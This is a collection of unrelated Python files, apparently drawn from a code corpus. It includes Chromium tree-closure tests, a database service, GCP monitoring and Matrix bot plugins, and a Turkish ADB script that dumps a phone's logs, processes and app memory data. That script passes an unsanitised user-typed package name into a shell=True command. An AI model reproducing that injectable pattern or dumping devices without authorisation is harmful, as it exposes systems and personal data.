def testDetectTreeClosureForTreeWithOneCompleteClosure(self):
all_statuses = [
TreeStatus(state='open'),
# A complete closure.
TreeStatus(
time=datetime(2017, 03, 31, 0, 0, 0), # timestamp is 1490918400.
message=('Tree is closed (Automatic: "compile" on '
'/builders/Win%20x64/builds/10327 "Win x64" from blabla'),
state='closed',
username='buildbot@chromium.org',
),
TreeStatus(
time=datetime(2017, 03, 31, 0, 1, 0),
message='Tree is closed (sheriff investigating)',
state='closed',
username='test@chromium.org',
),
TreeStatus(
time=datetime(2017, 03, 31, 0, 5, 0),
message='possible flake',
state='open',
username='test@chromium.org',
),
TreeStatus(
time=datetime(2017, 03, 31, 0, 15, 0),
message='speculative Reverted r12345678',
state='open',
username='test@chromium.org',
),
# An incomplete closure.
TreeStatus(state='closed')
]
num = collect_tree_closures._DetectTreeClosureForTree('c', all_statuses)
self.assertEqual(1, num)
key_str_id = '%s-%s' % ('c', 1490918400)
closure = ndb.Key(TreeClosure, key_str_id).get()
self.assertIsNotNone(closure)
self.assertEqual('c', closure.tree_name)
self.assertEqual(all_statuses[1:-1], closure.statuses)
self.assertEqual(datetime(2017, 03, 31, 0, 0, 0), closure.closed_time)
self.assertEqual(datetime(2017, 03, 31, 0, 5, 0), closure.opened_time)
self.assertEqual(
datetime(2017, 03, 31, 0, 15, 0), closure.latest_action_time)
self.assertTrue(closure.auto_closed)
self.assertFalse(closure.auto_opened)
self.assertTrue(closure.possible_flake)
self.assertTrue(closure.has_revert)
self.assertIsNone(closure.master_name)
self.assertEqual('Win x64', closure.builder_name)
self.assertEqual('10327', closure.build_id)
self.assertEqual('compile', closure.step_name)
def testDetectTreeClosureForTreeWithIncompleteClosure(self):
all_statuses = [
# A incomplete closure.
TreeStatus(
time=datetime(2017, 03, 31, 0, 0, 0), # timestamp is 1490918400.
message=('Tree is closed (Automatic: "compile" on '
'/builders/Win%20x64/builds/10327 "Win x64" from blabla'),
state='closed',
username='buildbot@chromium.org',
),
TreeStatus(
time=datetime(2017, 03, 31, 0, 15, 0),
message='possible flake',
state='open',
username='test@chromium.org',
),
]
num = collect_tree_closures._DetectTreeClosureForTree('c', all_statuses)
self.assertEqual(0, num)
key_str_id = '%s-%s' % ('c', 1490918400)
closure = ndb.Key(TreeClosure, key_str_id).get()
self.assertIsNone(closure)
@mock.patch.object(
collect_tree_closures,
'_GetCurrentCheckingPointForTree',
return_value=datetime(2017, 03, 01))
@mock.patch.object(
collect_tree_closures, '_RetrieveTreeStatus', return_value=['a'])
@mock.patch.object(
collect_tree_closures, '_DetectTreeClosureForTree', return_value=2)
def testGetWithStartTimeAndEndTime(self, mocked_detect_fun,
mocked_retrive_fun, mocked_check_fun):
response = self.test_app.get(
'/collect-tree-closures',
params={'start_time': '2017-04-01',
'end_time': '2017-04-05'},
headers={
'X-AppEngine-Cron': 'true'
})
self.assertEquals(200, response.status_int)
expected_result = {'chromium': 2}
self.assertEqual(expected_result, response.json_body)
self.assertFalse(mocked_check_fun.called)
mocked_retrive_fun.assert_called_once_with(
'chromium', datetime(2017, 04, 01), end_time=datetime(2017, 04, 05))
mocked_detect_fun.assert_called_once_with('chromium', ['a'])
@mock.patch.object(
collect_tree_closures,
'_GetCurrentCheckingPointForTree',
return_value=datetime(2017, 04, 01))
@mock.patch.object(
collect_tree_closures, '_RetrieveTreeStatus', return_value=['a'])
@mock.patch.object(
collect_tree_closures, '_DetectTreeClosureForTree', return_value=2)
def testGetWithoutStartTime(self, mocked_detect_fun, mocked_retrive_fun,
mocked_check_fun):
response = self.test_app.get(
'/collect-tree-closures', headers={
'X-AppEngine-Cron': 'true'
})
self.assertEquals(200, response.status_int)
expected_result = {'chromium': 2}
self.assertEqual(expected_result, response.json_body)
mocked_check_fun.assert_called_once_with('chromium')
mocked_retrive_fun.assert_called_once_with(
'chromium', datetime(2017, 04, 01), end_time=None)
mocked_detect_fun.assert_called_once_with('chromium', ['a'])
|
from time import time
b = 5
c = 3
d = 2
initime = time()
for x in range(100000):
    b = (c + d) % 100
    c = (b + d) % 1000
    d = (c + b + d) % 500
    b = (d - c) % 150
fintime = time()
print("TIME: " + str(fintime - initime))
|
from typing import List
from sqlalchemy.exc import InvalidRequestError, OperationalError
from sqlalchemy.orm import sessionmaker, Session
from DTO.run_type_dto import RunTypeDto, create_run_type
from config.base import getSession
from utils.checkers import Checkers
try:
from entities.lst_run_type import LstRunType
except ImportError as error:
Checkers.print_exception_one_param(error)
class LstRunTypeService:
def __init__(self):
self.__session: Session = getSession()
self.__all_run_type = None
self.__run_type_by_id = None
def insert_run_type(self, run_type_insert: RunTypeDto):
try:
run_type_aux = LstRunType(
description_run_type=run_type_insert.description_run_type
)
self.__session.add(run_type_aux)
self.__session.commit()
if run_type_aux.id_run_type is not None:
print("RECORD INSERTED IN TABLE '{}' WITH ID '{}'".format(LstRunType.__tablename__.name,
run_type_aux.id_run_type))
else:
print(" THE RECORD OF TABLE '{}' HAS NOT BEEN INSERTED".format(LstRunType.__tablename__.name))
except (InvalidRequestError, NameError) as error_request:
Checkers.print_exception_one_param(error_request)
except OperationalError as error_request2:
Checkers.print_exception_two_params(error_request2.orig.args[1], error_request2.orig.args[0])
def update_run_type(self, id_run_type, description_run_type=None):
try:
run_type_before: RunTypeDto = self.get_run_type_by_id(id_run_type)
if Checkers.validate_int(id_run_type,
LstRunType.id_run_type.name) and run_type_before.id_run_type is not None:
self.__session.query(LstRunType).filter(LstRunType.id_run_type.like(id_run_type)) \
.update({
LstRunType.description_run_type: Checkers.check_field_not_null(LstRunType.description_run_type,
description_run_type)
},
synchronize_session=False
)
self.__session.commit()
run_type_after: RunTypeDto = self.get_run_type_by_id(id_run_type)
if run_type_before.__dict__ != run_type_after.__dict__:
print(" RECORD UPDATED IN TABLE '{}' WITH ID '{}' ".format(LstRunType.__tablename__.name,
id_run_type))
else:
print(" THE RECORD OF TABLE '{}' HAS NOT BEEN UPDATED".format(LstRunType.__tablename__.name))
else:
print(" THE RECORD OF TABLE '{}' COULD NOT BE UPDATED ".format(LstRunType.__tablename__.name))
except (InvalidRequestError, NameError) as error_request:
Checkers.print_exception_one_param(error_request)
except OperationalError as error_request2:
Checkers.print_exception_two_params(error_request2.orig.args[1], error_request2.orig.args[0])
def delete_run_type(self, id_run_type):
try:
run_type_before: RunTypeDto = self.get_run_type_by_id(id_run_type)
if Checkers.validate_int(id_run_type,
LstRunType.id_run_type.name) and run_type_before.id_run_type is not None:
self.__session.query(LstRunType).filter(LstRunType.id_run_type.like(id_run_type)) \
.delete(synchronize_session=False)
self.__session.commit()
run_type_after: RunTypeDto = self.get_run_type_by_id(id_run_type)
if run_type_before.id_run_type is not None and run_type_after.id_run_type is None:
print("RECORD DELETE IN TABLE '{}' WITH ID '{}'".format(LstRunType.__tablename__.name,
id_run_type))
else:
print(" THE RECORD OF TABLE '{}' WITH ID '{}' HAS NOT BEEN DELETED BECAUSE IT DID NOT EXIST".format(
LstRunType.__tablename__.name,
id_run_type))
else:
print(" THE RECORD OF TABLE '{}' COULD NOT BE DELETED".format(LstRunType.__tablename__.name))
except (InvalidRequestError, NameError) as error_request:
Checkers.print_exception_one_param(error_request)
except OperationalError as error_request2:
Checkers.print_exception_two_params(error_request2.orig.args[1], error_request2.orig.args[0])
def get_all_run_type(self):
run_type_dto_list = []
try:
self.__all_run_type: List[RunTypeDto] = self.__session.query(LstRunType).all()
if len(self.__all_run_type) != 0:
for row in self.__all_run_type:
run_type_aux = create_run_type(
row.id_run_type,
row.description_run_type
)
run_type_dto_list.append(run_type_aux)
else:
Checkers.empty_list(LstRunType.__tablename__.name)
except (InvalidRequestError, NameError) as error_request:
Checkers.print_exception_one_param(error_request)
except OperationalError as error_request2:
Checkers.print_exception_two_params(error_request2.orig.args[1], error_request2.orig.args[0])
return run_type_dto_list
def get_run_type_by_id(self, id_run_type):
try:
self.__run_type_by_id: RunTypeDto = self.__session.query(LstRunType).filter(
LstRunType.id_run_type.like(id_run_type)).first()
if self.__run_type_by_id is not None:
return create_run_type(
self.__run_type_by_id.id_run_type,
self.__run_type_by_id.description_run_type
)
else:
Checkers.print_object_filter_null(LstRunType.id_run_type.name, str(id_run_type))
return create_run_type(None, None)
except (InvalidRequestError, NameError) as error_request:
Checkers.print_exception_one_param(error_request)
except OperationalError as error_request2:
Checkers.print_exception_two_params(error_request2.orig.args[1], error_request2.orig.args[0])
return create_run_type(None, None)
|
print("""
######### ######## # # ######## ############
# # # # # # # # #
# # # # # # # # #
######### ######## # # ######## ############
# # # # # # # # #
# # # # # # # # #
######### ######## # # # # # #
\n Made by @EBSSecurty
""")
print("www.ebubekirbastama.com"+"\n")
import subprocess
komutumprocess = 'adb.exe shell ps'
komutumls = 'adb.exe shell ls -all'
komutumnetstat = 'adb.exe shell netstat'
devicessinfoversion = 'adb.exe shell getprop'
log = 'adb.exe logcat -d > telefonlogları.txt'
bugreport='adb.exe bugreport > telefonBuglogları.txt'
sysdump='adb.exe shell dumpsys > telefonBütün_Bilgileri.txt'
packetdump='adb.exe shell dumpsys activity > Paketisimleri.txt'
memdump='adb.exe shell dumpsys meminfo > meminfo.txt'
memdumpdetayli='adb.exe shell dumpsys meminfo'
print("1-) Process Listeleme"+"\n"+"2-) Klasör ve Ayrıntıları Listeleme"+"\n"+"3-) Netstat Çalıştırma"+"\n"+"4-) Telefon Detaylı Versiyon Bilgileri"+"\n"+"5-) Telefon Logları Çıktı Al"
+"\n"+"6-) Telefon Bug Report Çıktı Al"+"\n"+"7-) Bütün Telefon Sistem Bilgileri(Wifi,batarya vb.)"+"\n"+"8-) Telefondaki Bütün Apk Paket İsimleri."
+"\n"+"9-) Telefon Memori Packet Bilgileri"+"\n"+"10-) Packet İsmine Göre Memoriden Bilgi Getir."
)
numara=input("Neyapmak İstersin..."+"?\n")
if numara == "1":
    piey = subprocess.Popen(komutumprocess, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = piey.communicate()
    print(stdout.decode(errors="ignore"))
elif numara == "2":
    piey = subprocess.Popen(komutumls, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = piey.communicate()
    print(stdout.decode(errors="ignore"))
elif numara == "3":
    piey = subprocess.Popen(komutumnetstat, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = piey.communicate()
    print(stdout.decode(errors="ignore"))
elif numara == "4":
    piey = subprocess.Popen(devicessinfoversion, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = piey.communicate()
    print(stdout.decode(errors="ignore"))
elif numara == "5":
    piey = subprocess.Popen(log, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = piey.communicate()
    print("Logs exported successfully.")
elif numara == "6":
    print("The export may take a while, please wait...")
    piey = subprocess.Popen(bugreport, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = piey.communicate()
    print("Bug report exported successfully.")
elif numara == "7":
    print("The export may take a while, please wait...")
    piey = subprocess.Popen(sysdump, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = piey.communicate()
    print("System info exported successfully.")
elif numara == "8":
    print("The export may take a while, please wait...")
    piey = subprocess.Popen(packetdump, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = piey.communicate()
    print("Package info exported successfully.")
elif numara == "9":
    print("The export may take a while, please wait...")
    piey = subprocess.Popen(memdump, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = piey.communicate()
    print("Memory info exported successfully.")
elif numara == "10":
    packet_ismi = input("Please enter the package name, e.g. com.whatsapp" + "?\n")
    dtyy = memdumpdetayli + " " + packet_ismi + " > memdetayliinfo.txt"
    piey = subprocess.Popen(dtyy, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = piey.communicate()
    print("Memory info exported successfully.")
|
"""Collection of code generation utils."""
import os
import shutil
from pathlib import Path
from typing import Union
from black import WriteBack, format_file_in_place
from black.mode import Mode
from git import RemoteProgress, Repo
from mypy.stubgen import generate_stubs, parse_options
PROJECT_DIRECTORY = Path(__file__).parent.parent
def format_codegen(dst_dir: Union[str, Path], line_length: int = 180) -> None:
"""Format target files using black."""
mode = Mode(
line_length=line_length,
)
if isinstance(dst_dir, Path):
dst_dir = dst_dir.absolute().as_posix()
for dirpath, _, filenames in os.walk(dst_dir):
for fn in filenames:
format_file_in_place(Path(dirpath, fn), True, mode, WriteBack.YES)
def comment_codegen(dst_dir: Union[str, Path], name: str) -> None:
"""Prepend codegen comment to al files in a directory."""
if isinstance(dst_dir, Path):
dst_dir = dst_dir.absolute().as_posix()
for dirpath, _, filenames in os.walk(dst_dir):
for fn in filenames:
with open(os.path.join(dirpath, fn), "r") as original:
file_content = original.read()
with open(os.path.join(dirpath, fn), "w") as modified:
modified.write("# Code generated by `{0}`. DO NOT EDIT.\n".format(name) + file_content)
def clone_and_generate(clone_dir: Path, package_dir: Path, dst_dir: Path, branch: str) -> None:
"""Clone source repo and generate stubs for package.
:param Path clone_dir: Where to clone source repo
:param Path package_dir: Path to module that needs stubs generated
:param Path dst_dir: Destination path for stubs
:param str branch: Which branch to clone
"""
if clone_dir.exists():
shutil.rmtree(clone_dir)
clone_dir.mkdir(exist_ok=True, parents=False)
repo = Repo.clone_from(
"https://github.com/kubernetes-client/python.git",
clone_dir,
progress=RemoteProgress(),
branch=branch,
depth=1,
)
for submodule in repo.submodules:
submodule.update(init=True)
stubgen_options = parse_options(
[
"{0}".format(package_dir),
"-o={0}".format(dst_dir),
],
)
generate_stubs(stubgen_options)
comment_codegen(dst_dir, "stubgen")
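# A minimal sketch (hypothetical paths and branch) of how these helpers might be
# chained together; the kubernetes-client/python repo URL is hard-coded in
# clone_and_generate() above, and the directory names below are assumptions.
if __name__ == "__main__":
    _clone_dir = PROJECT_DIRECTORY / "build" / "python"    # assumed scratch location
    _package_dir = _clone_dir / "kubernetes"               # assumed package to stub
    _dst_dir = PROJECT_DIRECTORY / "kubernetes-stubs"      # assumed output location
    clone_and_generate(_clone_dir, _package_dir, _dst_dir, branch="master")
    format_codegen(_dst_dir)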
|
"""
Mesh code processing module.
"""
from math import floor
from typing import Tuple
def get_meshcode(lat: float, lon: float) -> str:
"""経度・緯度からメッシュコード(1 次、2 次、3 次)を取得
Args:
lat(float): 緯度(10 進数)
lon(float): 経度(10 進数)
Returns:
str: 1 次メッシュコード(4 桁), 2 次メッシュコード(2 桁), 3 次メッシュコード(2 桁) 計8桁
"""
lt = lat * 3.0 / 2.0
lg = lon
y1 = floor(lt)
x1 = floor(lg)
lt = (lt - y1) * 8.0
lg = (lg - x1) * 8.0
y2 = floor(lt)
x2 = floor(lg)
lt = (lt - y2) * 10.0
lg = (lg - x2) * 10.0
y3 = floor(lt)
x3 = floor(lg)
code1 = 0
code1 += int(y1) % 100 * 100
code1 += int(x1) % 100 * 1
code2 = 0
code2 += int(y2) * 10
code2 += int(x2) * 1
code3 = 0
code3 += int(y3) * 10
code3 += int(x3) * 1
return str(code1 * 10000 + code2 * 100 + code3)
def get_mesh_latlon(meshcode: str) -> Tuple[float, float]:
"""メッシュコードから経度緯度への変換
Args:
meshcode(str): メッシュコード
Returns:
Tuple[float, float]: 緯度(10 進数), 経度(10 進数)
"""
    # Compute latitude/longitude from the mesh code (this yields the south-west corner, not the centre)
y1 = int(meshcode[:2])
x1 = int(meshcode[2:4])
y2 = int(meshcode[4])
x2 = int(meshcode[5])
y3 = int(meshcode[6])
x3 = int(meshcode[7])
    # Derive the mesh-centre latitude from the south-west corner
lat = ((y1 * 80 + y2 * 10 + y3) * 30 / 3600) + 15 / 3600
    # Derive the mesh-centre longitude from the south-west corner
lon = (((x1 * 80 + x2 * 10 + x3) * 45 / 3600) + 100) + 22.5 / 3600
return lat, lon
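# A small usage sketch (coordinates chosen for illustration, near Tokyo Station)
# round-tripping a point through the two functions above.
if __name__ == "__main__":
    code = get_meshcode(35.681236, 139.767125)
    print(code)                   # expected: 53394611
    print(get_mesh_latlon(code))  # mesh-centre latitude/longitude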
|
from matrix_bot.mbot.plugins import Plugin, civility
import random
class GuessNumberPlugin(Plugin):
"""Play a guess the number game.
You have to guess what the number is in a certain number of attempts. You
will be told information such as higher/lower than the guessed number.
guessnumber new : Starts a new game.
guessnumber hint : Get a hint for the number. Consumes an attempt.
guessnumber guess <number> : Guess the number. Consumes an attempt.
"""
name = "guessnumber"
MAX_NUM = 100
ATTEMPTS = 5
def __init__(self, *args, **kwargs):
        super(GuessNumberPlugin, self).__init__(*args, **kwargs)
self.games = {}
@civility
def cmd_new(self, event):
"""Start a new game. 'guessnumber new'"""
usr = event["sender"]
game_state = {
"num": random.randint(0, GuessNumberPlugin.MAX_NUM),
"attempts": 0
}
self.games[usr] = game_state
return (
self.tr.trans(
"Created a new game."
"Guess what the chosen number is between 0-%s. You have %s attempts."
) % (GuessNumberPlugin.MAX_NUM, GuessNumberPlugin.ATTEMPTS)
)
@civility
def cmd_guess(self, event, num):
"""Make a guess. 'guessnumber guess <number>'"""
usr = event["sender"]
if usr not in self.games:
return self.tr.trans("You need to start a game first.")
int_num = -1
try:
int_num = int(num)
        except ValueError:
return self.tr.trans("That isn't a number.")
target_num = self.games[usr]["num"]
if int_num == target_num:
self.games.pop(usr)
return self.tr.trans("You win!")
game_over = self._add_attempt(usr)
if game_over:
return game_over
else:
sign = self.tr.trans("greater") \
if (target_num > int_num) else self.tr.trans("less")
return self.tr.trans("Nope. The number is %s than that.") % sign
@civility
def cmd_hint(self, event):
"""Get a hint. 'guessnumber hint'"""
# hints give a 50% reduction, e.g. between 0-50, even/odd, ends with 12345
usr = event["sender"]
if usr not in self.games:
return self.tr.trans("You need to start a game first.")
num = self.games[usr]["num"]
hint_pool = [self._odd_even, self._ends_with, self._between]
hint_func = hint_pool[random.randint(1, len(hint_pool)) - 1]
game_over = self._add_attempt(usr)
if game_over:
return game_over
return hint_func(num)
def _add_attempt(self, usr):
self.games[usr]["attempts"] += 1
if self.games[usr]["attempts"] >= GuessNumberPlugin.ATTEMPTS:
res = self.tr.trans(
"Out of tries. The number was %s."
) % self.games[usr]["num"]
self.games.pop(usr)
return res
def _between(self, num):
half = GuessNumberPlugin.MAX_NUM / 2
if num < half:
return "The number is less than %s." % half
else:
return "The number is %s or greater." % half
def _ends_with(self, num):
actual = num % 10
if actual < 5:
return self.tr.trans("The last digit is either 0, 1, 2, 3, 4.")
else:
return self.tr.trans("The last digit is either 5, 6, 7, 8, 9.")
def _odd_even(self, num):
if num % 2 == 0:
return self.tr.trans("The number is even.")
else:
return self.tr.trans("The number is odd.")
|
import datetime
import glob
import json
import logging
import os
import re
from ruxit.api.base_plugin import RemoteBasePlugin
from googleapiclient.discovery import build
from google.oauth2 import service_account
COMPUTE_METRICS = [
'compute.googleapis.com/instance/cpu/utilization',
'compute.googleapis.com/instance/disk/read_bytes_count',
'compute.googleapis.com/instance/disk/read_ops_count',
'compute.googleapis.com/instance/disk/write_bytes_count',
'compute.googleapis.com/instance/disk/write_ops_count',
'compute.googleapis.com/instance/network/received_bytes_count',
'compute.googleapis.com/instance/network/received_packets_count',
'compute.googleapis.com/instance/network/sent_bytes_count',
'compute.googleapis.com/instance/network/sent_packets_count',
'compute.googleapis.com/instance/uptime'
]
#class RemoteGCPPlugin():
class RemoteGCPPlugin(RemoteBasePlugin):
logger = logging.getLogger(__name__)
def initialize(self, **kwargs):
self.debug = False
self.project_jwt = kwargs['config']['project_jwt']
        # the config value arrives as a str(dict) with single quotes; json.loads and the Google client library need double quotes
self.project_jwt = str(self.project_jwt).replace('{\'', '{"')
self.project_jwt = str(self.project_jwt).replace('\': \'', '": "')
self.project_jwt = str(self.project_jwt).replace('\', \'', '", "')
self.project_jwt = str(self.project_jwt).replace('\'}', '"}')
if 'debug' in kwargs:
self.debug = True
return
def log(self, message):
if self.debug:
print(message)
else:
self.logger.info(__name__ + ": " + message)
@staticmethod
def format_rfc3339(datetime_instance):
return datetime_instance.isoformat("T") + "Z"
def get_start_time(self):
start_time = (datetime.datetime.utcnow() -
datetime.timedelta(minutes=5))
return self.format_rfc3339(start_time)
def get_end_time(self):
end_time = datetime.datetime.utcnow() - datetime.timedelta(minutes=0)
return self.format_rfc3339(end_time)
def build_requests(self, client, project_id):
requests = []
project_resource = "projects/{}".format(project_id)
for metric in COMPUTE_METRICS:
request = client.projects().timeSeries().list(
name=project_resource,
filter='metric.type="{}"'.format(metric),
interval_startTime=self.get_start_time(),
interval_endTime=self.get_end_time())
requests.append(request)
return requests
@staticmethod
def execute_requests(requests):
responses = []
for request in requests:
response = request.execute()
responses.append(response)
return responses
@staticmethod
def get_or_create_instance(instances, instance_name):
for instance in instances:
if instance['instance_name'] == instance_name:
return instance
instance = {'instance_name': instance_name}
instances.append(instance)
return instance
def process_response(self, instances, response):
# check if there was a data point in the given time frame
if 'timeSeries' in response:
for time_series in response['timeSeries']:
instance_name = time_series['metric']['labels']['instance_name']
instance = self.get_or_create_instance(instances, instance_name)
instance['instance_id'] = time_series['resource']['labels']['instance_id']
instance['zone'] = time_series['resource']['labels']['zone']
if not 'metrics' in instance:
instance['metrics'] = {}
# replace '/' with '-' because the remote plugin doesn't allow metrics with '/' in the name
metric_name = str(time_series['metric']['type']).replace('/', '-')
metric_value_type = str(time_series['valueType']).lower() + "Value"
# TODO: instead of taking first value, calculate avg of returned metric points (sliding average)
# TODO: review statistical background and recommendation
metric_value = time_series['points'][0]['value'][metric_value_type]
metric_timestamp = time_series['points'][0]['interval']['endTime']
instance['metrics'][metric_name] = {}
instance['metrics'][metric_name]['valueType'] = metric_value_type
instance['metrics'][metric_name]['value'] = metric_value
instance['metrics'][metric_name]['timestamp'] = metric_timestamp
def get_instances(self, project_jwt):
instances = []
project_id = project_jwt["project_id"]
self.log("Processing '{}'".format(project_id))
#credentials = service_account.Credentials.from_service_account_file(project_jwt)
credentials = service_account.Credentials.from_service_account_info(project_jwt)
client = build('monitoring', 'v3', credentials=credentials)
requests = self.build_requests(client, project_id)
responses = self.execute_requests(requests)
for response in responses:
self.process_response(instances, response)
return instances
def get_instance_details(self, list_of_instances, project_jwt):
self.log("Getting instance details")
credentials = service_account.Credentials.from_service_account_info(project_jwt)
compute = build('compute', 'v1', credentials=credentials)
project_id = project_jwt["project_id"]
for instance in list_of_instances:
zone = instance['zone']
instance_name = instance['instance_name']
request = compute.instances().get(project=project_id, zone=zone, instance=instance_name)
instance_details = request.execute()
instance['properties'] = {}
instance['properties']['creation_timestamp'] = instance_details['creationTimestamp']
instance['properties']['description'] = instance_details['description']
instance['properties']['machineType'] = instance_details['machineType']
instance['properties']['status'] = instance_details['status']
instance['properties']['cpuPlatform'] = instance_details['cpuPlatform']
instance['properties']['link'] = instance_details['selfLink']
nic_counter = 0
for instance_nic in instance_details['networkInterfaces']:
key = 'nic_' + str(nic_counter) + '_name'
instance['properties'][key] = instance_nic['name']
key = 'nic_' + str(nic_counter) + '_ip'
instance['properties'][key] = instance_nic['networkIP']
access_config_counter = 0
for accessConfig in instance_nic['accessConfigs']:
key = 'nic_' + str(nic_counter) + '_accessConfig_' + str(access_config_counter) + '_ip'
instance['properties'][key] = accessConfig['natIP']
access_config_counter = access_config_counter + 1
nic_counter = nic_counter + 1
return list_of_instances
def create_group(self, group_id, group_name, project_id):
extended_group_id = group_id + "_" + project_id
extended_group_name = group_name + " (" + project_id + ")"
self.log("- group id='{}', name='{}'".format(extended_group_id, extended_group_name))
if self.debug:
group = None
else:
group = self.topology_builder.create_group(extended_group_id, extended_group_name)
return group
def report_metrics(self, group, list_of_instances):
for instance in list_of_instances:
self.log("--- element '{}', '{}'".format(instance['instance_id'], instance['instance_name']))
if not self.debug:
element = group.create_element(instance['instance_id'], instance['instance_name'])
for key,value in instance['properties'].items():
self.log("---- element_property {}={}".format(key, value))
# consider endpoints to add to element
containsIpAddress = re.match(".*_ip$", key)
if containsIpAddress:
self.log("---- endpoint {}".format(value))
if not self.debug:
element.add_endpoint(value, 0)
if not self.debug:
element.report_property(key, value)
for key, value in instance['metrics'].items():
self.log("----- absolute {}={}".format(key, value['value']))
if not self.debug:
element.absolute(key=key, value=value['value'])
def query(self, **kwargs):
project_jwt_json = json.loads(self.project_jwt)
list_of_instances = self.get_instances(project_jwt_json)
list_of_instances = self.get_instance_details(list_of_instances, project_jwt_json)
group = self.create_group("ComputeEngine", "Compute Engine", project_jwt_json["project_id"])
self.report_metrics(group, list_of_instances)
#class Test:
# @staticmethod
# def test():
# plugin = RemoteGCPPlugin()
#
# with open('gcp-project.json') as project_jwt_json:
# project_jwt = json.load(project_jwt_json)
# kwargs = {'debug': True, 'config': { 'project_jwt' : str(project_jwt)}}
#
# plugin.initialize(**kwargs)
# plugin.query()
#
#if __name__ == "__main__":
# Test.test()
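# A minimal sketch (not wired into the plugin above) of a sturdier way to recover the
# service-account dict from its single-quoted str(dict) form: ast.literal_eval parses
# Python-dict syntax directly, avoiding the chain of replace() calls in initialize().
def _parse_project_jwt(raw_value):
    """Parse a str(dict)-style config value into a dict (hypothetical helper)."""
    import ast
    return ast.literal_eval(str(raw_value))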
|
"""Produce new haiku from training corpus of existing haiku."""
import sys
import logging
import random
import json
from collections import defaultdict
from generate_corpus_missing_words.count_syllables import count_syllables
from string import punctuation
logging.disable(logging.CRITICAL) # comment-out to enable debugging messages
logging.basicConfig(level=logging.DEBUG, format='%(message)s')
def load_corpus():
"""Load the corpus as a string."""
with open('generate_corpus_missing_words/corpus.json') as f_obj:
corpus = json.load(f_obj)
return corpus
def map_word_to_word(corpus):
"""Load list & use dictionary to map word to word that follows."""
limit = len(corpus)-1
dict1_to_1 = defaultdict(list)
for index, word in enumerate(corpus):
if index < limit:
suffix = corpus[index + 1]
dict1_to_1[word].append(suffix)
logging.debug("map_word_to_word results for \"sake\" = %s\n",
dict1_to_1['sake'])
return dict1_to_1
def map_2_words_to_word(corpus):
"""Load list & use dictionary to map word-pair to trailing word."""
limit = len(corpus)-2
dict2_to_1 = defaultdict(list)
for index, word in enumerate(corpus):
if index < limit:
key = word + ' ' + corpus[index + 1]
suffix = corpus[index + 2]
dict2_to_1[key].append(suffix)
logging.debug("map_2_words_to_word results for \"sake jug\" = %s\n",
dict2_to_1['sake jug'])
return dict2_to_1
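# A tiny illustration (hypothetical corpus) of the two mappings built above:
#   corpus = ['an', 'old', 'pond', 'an', 'old', 'frog']
#   map_word_to_word(corpus)['an']        -> ['old', 'old']
#   map_2_words_to_word(corpus)['an old'] -> ['pond', 'frog']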
def random_word(corpus):
"""Return random word and syllable count from training corpus."""
word = random.choice(corpus)
num_syls = count_syllables(word)
    if num_syls > 4:
        return random_word(corpus)
else:
logging.debug("random word & syllables = %s %s\n", word, num_syls)
return (word, num_syls)
def word_after_single(prefix, suffix_map_1, current_syls, target_syls):
"""Return all acceptable words in a corpus that follow a single word."""
accepted_words = []
suffixes = suffix_map_1.get(prefix)
if suffixes is not None:
for candidate in suffixes:
num_syls = count_syllables(candidate)
if current_syls + num_syls <= target_syls:
accepted_words.append(candidate)
logging.debug("accepted words after \"%s\" = %s\n",
prefix, set(accepted_words))
return accepted_words
def word_after_double(prefix, suffix_map_2, current_syls, target_syls):
"""Return all acceptable words in a corpus that follow a word pair."""
accepted_words = []
suffixes = suffix_map_2.get(prefix)
if suffixes is not None:
for candidate in suffixes:
num_syls = count_syllables(candidate)
if current_syls + num_syls <= target_syls:
accepted_words.append(candidate)
logging.debug("accepted words after \"%s\" = %s\n",
prefix, set(accepted_words))
return accepted_words
def haiku_line(suffix_map_1, suffix_map_2, corpus, end_prev_line, target_syls):
"""Build a haiku line from a training corpus and return it."""
line = '2/3'
line_syls = 0
current_line = []
if len(end_prev_line) == 0: # build first line
line = '1'
word, num_syls = random_word(corpus)
current_line.append(word)
line_syls += num_syls
word_choices = word_after_single(word, suffix_map_1,
line_syls, target_syls)
while len(word_choices) == 0:
prefix = random.choice(corpus)
logging.debug("new random prefix = %s", prefix)
word_choices = word_after_single(prefix, suffix_map_1,
line_syls, target_syls)
word = random.choice(word_choices)
num_syls = count_syllables(word)
logging.debug("word & syllables = %s %s", word, num_syls)
line_syls += num_syls
current_line.append(word)
if line_syls == target_syls:
end_prev_line.extend(current_line[-2:])
return current_line, end_prev_line
else: # build lines 2 & 3
current_line.extend(end_prev_line)
while True:
logging.debug("line = %s\n", line)
prefix = current_line[-2] + ' ' + current_line[-1]
word_choices = word_after_double(prefix, suffix_map_2,
line_syls, target_syls)
while len(word_choices) == 0:
index = random.randint(0, len(corpus) - 2)
prefix = corpus[index] + ' ' + corpus[index + 1]
logging.debug("new random prefix = %s", prefix)
word_choices = word_after_double(prefix, suffix_map_2,
line_syls, target_syls)
word = random.choice(word_choices)
num_syls = count_syllables(word)
logging.debug("word & syllables = %s %s", word, num_syls)
if line_syls + num_syls > target_syls:
continue
elif line_syls + num_syls < target_syls:
current_line.append(word)
line_syls += num_syls
elif line_syls + num_syls == target_syls:
current_line.append(word)
break
end_prev_line = []
end_prev_line.extend(current_line[-2:])
if line == '1':
final_line = current_line[:]
else:
final_line = current_line[2:]
return final_line, end_prev_line
def main():
"""Give user choice of building a haiku or modifying an existing haiku."""
intro = """\n
A thousand monkeys at a thousand typewriters...
or one computer...can sometimes produce a haiku.\n"""
print("{}".format(intro))
corpus = load_corpus()
suffix_map_1 = map_word_to_word(corpus)
suffix_map_2 = map_2_words_to_word(corpus)
final = []
choice = None
while choice != "0":
print(
"""
Japanese Haiku Generator
0 - Quit
1 - Generate a Haiku poem
2 - Regenerate Line 2
3 - Regenerate Line 3
"""
)
choice = input("Choice: ")
print()
# exit
if choice == "0":
print("Sayonara.")
sys.exit()
